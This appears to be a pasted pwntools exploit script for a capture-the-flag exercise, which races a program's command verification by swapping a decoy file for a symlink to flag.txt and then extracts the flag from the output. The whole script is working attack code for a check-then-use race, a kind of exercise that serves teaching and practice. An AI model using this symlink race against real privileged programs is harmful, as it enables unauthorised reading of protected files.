xosski

Ctf binary

Dec 13th, 2024
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3. # This exploit template was generated via:
  4. # $ pwn template ./main.elf
import os
import re
import shutil
import time

from pwn import *
  9.  
# Set up pwntools for the correct architecture: load the target ELF and make it
# the context binary. The path can be overridden on the command line
# (./exploit.py EXE=/path/to/binary); otherwise ./main.elf is used.
exe = context.binary = ELF(args.EXE or './main.elf')

# This is necessary to spawn the debugger in a separate panel (tmux split).
# Make sure to start tmux before using the GDB argument, else you will get some error.
context(terminal=['tmux', 'split-window', '-h'])
  16.  
# Flag format expected in the target's output: "InfoSec{...}". The lazy
# quantifier keeps the capture at the first closing brace so unrelated
# output after the flag does not get swallowed into the match.
_FLAG_PATTERN = r"(InfoSec{.+?})"
flag_regex = re.compile(_FLAG_PATTERN)
  19.  
  20. # Many built-in settings can be controlled on the command-line and show up
  21. # in "args". For example, to dump all data sent/received, and disable ASLR
  22. # for all created processes...
  23. # ./exploit.py DEBUG NOASLR
  24.  
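def start(argv=None, *a, **kw):
    '''Start the exploit against the target.

    Spawns the target binary (``exe.path``) followed by the extra command-line
    arguments in *argv* (any iterable of strings; default none). Extra
    positional/keyword arguments are forwarded to the pwntools launcher. When
    the exploit is invoked with the GDB argument the process is started under
    gdb with ``gdbscript``; otherwise it is a plain ``process``.
    '''
    # Build a fresh list per call: a mutable default argument would be shared
    # between calls, and list() also accepts tuples and other iterables.
    argv = list(argv) if argv else []
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    return process([exe.path] + argv, *a, **kw)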
  31.  
# GDB commands executed when the exploit is launched with the GDB argument
# (./exploit.py GDB): stop once at main, then let the target run so the
# exploit's I/O drives it from there.
gdbscript = "\n".join((
    "",
    "tbreak main",
    "continue",
    "",
))
  39.  
# Start the process (under GDB when run with the GDB argument). Every helper
# below that talks to the target reads from and writes to this tube.
io = start()
  42.  
  43. # Student Code Area
  44. ########################################################################
  45.  
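# Remove a leftover file (or symlink) from a previous run, if any
def remove_file(file_path):
    '''Delete *file_path* if it exists and log the removal; do nothing otherwise.

    Uses unlink directly instead of an ``os.path.exists`` check: exists()
    follows symlinks, so a dangling link (this exploit leaves something.txt
    pointing at flag.txt, which need not exist locally) is reported as absent
    and would be left in place, making the later ``os.symlink`` fail with
    FileExistsError. Directories are not handled; unlink raises as usual.
    '''
    try:
        os.unlink(file_path)
    except FileNotFoundError:
        # Nothing to remove (or it vanished between runs) - not an error.
        return
    log.info(f"Removed file: {file_path}")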
  51.  
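# Ensure the decoy file is present as a plain regular file
def create_something_txt(path="something.txt", content="something"):
    '''Write *content* to *path*, creating or truncating it, and log the result.

    This is the harmless file the exploit later asks the target to ``cat``;
    it is created as an ordinary regular file so the target sees nothing
    suspicious when it examines the path. The defaults reproduce the original
    behaviour (something.txt containing the text "something").
    '''
    with open(path, "w") as fh:
        fh.write(content)
    log.info(f"Created '{path}' with content.")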
  57.  
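# Read from the target until a marker shows up, with an overall deadline
def wait_for_output(pattern, timeout=5, conn=None):
    '''Collect output from *conn* until *pattern* (bytes) appears.

    Returns everything received so far (bytes) as soon as *pattern* is found.
    Also returns what was collected on EOF, or once *timeout* seconds have
    passed without a match - previously a target that stayed alive but never
    printed the marker made this loop forever, because a timed-out recv()
    returns b"" rather than raising. *conn* defaults to the module-level
    ``io`` tube; anything with ``settimeout()`` and ``recv(timeout=)`` works.
    '''
    if conn is None:
        conn = io
    deadline = time.monotonic() + timeout
    conn.settimeout(timeout)
    output = b""
    while time.monotonic() < deadline:
        try:
            # Short per-call timeout so the deadline is re-checked regularly.
            data = conn.recv(timeout=1)
        except EOFError:
            break
        if data:
            output += data
            if pattern in output:
                break
    return output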
  72.  
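# Exploit flow. Judging by the marker waited on below, the target validates
# the supplied command (and, presumably, the file it names) before running it
# and announces "Verified command, running..." in between. The steps below
# race that check-then-use gap: the path the target verified is a harmless
# regular file, and it is swapped for a symlink to flag.txt before the command
# actually executes, so the already-validated name now resolves to the flag.
# The window is short and there is no retry loop: if no flag is found, re-run
# (DEBUG on the command line shows the raw I/O).

# Start from a clean state: a leftover something.txt from an earlier run would
# make os.symlink() below fail with FileExistsError, and the target must see a
# plain file with harmless content when it inspects the path.
remove_file("something.txt")
create_something_txt()

# Ask the target to read the decoy file.
io.sendline(b"cat something.txt")

# Block until the target reports that validation is over; after this point the
# path has to resolve to the flag.
log.info("Waiting for output...")
output = wait_for_output(b"Verified command, running...")

# Swap the verified file for a symlink to the flag (the check-then-use race).
remove_file("something.txt")
log.info("Creating symlink to flag.txt...")
os.symlink("flag.txt", "something.txt")

# Local bookkeeping: shutil.copy follows the link, so solution.txt receives the
# content of flag.txt when that file exists here. A missing local flag.txt must
# not abort the exploit before the flag is read from the target's output.
remove_file("solution.txt")
try:
    shutil.copy("something.txt", "solution.txt")
    log.info("Copied symlinked 'something.txt' to 'solution.txt'.")
except FileNotFoundError:
    log.warning("flag.txt is not present locally; solution.txt not written.")

# Collect the rest of the output (until the marker appears again, EOF or the
# timeout) so the flag printed by the command is in the buffer.
log.info("Waiting for final output to extract the flag...")
output = wait_for_output(b"Verified command, running...")

# The target may emit non-UTF-8 bytes; errors="replace" keeps a stray byte from
# raising UnicodeDecodeError and aborting before the flag is extracted.
flag_match = flag_regex.search(output.decode(errors="replace"))
if flag_match:
    log.success(f"Flag found: {flag_match.group(0)}")
else:
    # pwntools' log.error() raises and would terminate the script before the
    # interactive session below - exactly when a manual look is most useful.
    log.failure("Flag not found in output.")

# End of exploit: hand the session over for manual inspection if needed.
io.interactive()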
  109.  
  110. ########################################################################